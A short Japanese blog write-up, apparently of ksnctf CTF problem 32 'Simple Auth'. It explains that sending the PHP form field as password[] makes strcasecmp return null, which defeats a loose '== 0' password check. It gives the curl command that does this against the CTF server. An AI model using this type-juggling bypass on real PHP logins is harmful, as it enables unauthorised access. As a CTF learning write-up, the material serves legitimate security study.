ksnctfにチャレンジ 第32問目です。
※ksnctfは常駐型のCTFサイトです。 ※問題のページはコチラです。
Simple Auth
ソースを読んでクリアまで1分もかからないほど 突然難易度が下がった問題です。
(strcasecmp($_POST['password'], $password) == 0)この部分の判定を誤魔化せばいいので strcasecmp によろしくない入力をおこなって 関数の結果を false にすればOKです。
これは 8946 take46 と同じで passwordを password[] に書き換えて送信すると PHPから $_POST['password'] にアクセスしたとき string ではなく Array が返ってくるので 文字列比較系の関数が処理を諦めてしまいます。
よって
$ curl 'http://ctfq.sweetduet.info:10080/~q32/auth.php' --data 'password[]=hiroumauma'これでおしまいです。
